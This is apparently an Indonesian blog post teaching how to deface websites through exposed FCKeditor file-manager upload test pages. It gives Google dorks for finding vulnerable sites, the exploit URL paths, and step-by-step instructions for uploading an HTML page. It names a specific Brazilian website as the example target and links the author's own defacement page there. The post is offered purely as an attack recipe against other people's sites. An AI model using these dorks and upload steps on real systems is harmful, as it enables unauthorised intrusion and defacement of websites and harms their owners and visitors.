hmmm,kali ini akyra akan posting tentang deface web dengan metode FCKeditor
Dorknya:coba2 aja...
- inurl:/editor/editor/filemanager/
- inurl:/HTMLEditor/editor/"
- inurl:/HTMLEditor/editor//filemanager/
- inurl:/HTMLEditor/editor/filemanager/connectors/
Exploit:http://[target.com]/editor/editor/filemanager/upload/test.html
http://[Target.com]/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
dork diatas ^ isi kan d google, cari trget...klo dapat
ex: http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/
inject kn exploit ny d atas....
jdinya.......
ex : http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/upload/test.html
pada [Select the "File Uploader" to use: ] <----- pilih PHP
terus upload html kmu.....
klik send it to server, kalo sukses or terupload maka pada kotak [Uploaded File URL:] akan memberikan patch dimana file kamu terupload
ex : yang keluar pada kotak [Uploaded File URL:] : /UserFiles/html_kamu.html
maka hasil nya ada di http://[target.com]/editor/html_kamu.html
mudah kn....hehehehehe
nih,hasil pepes ane :D
http://www.centerkennedy.com.br/editor/images/anon_knight.html
sumber : Hacker Indonesia
0 komentar:
Posting Komentar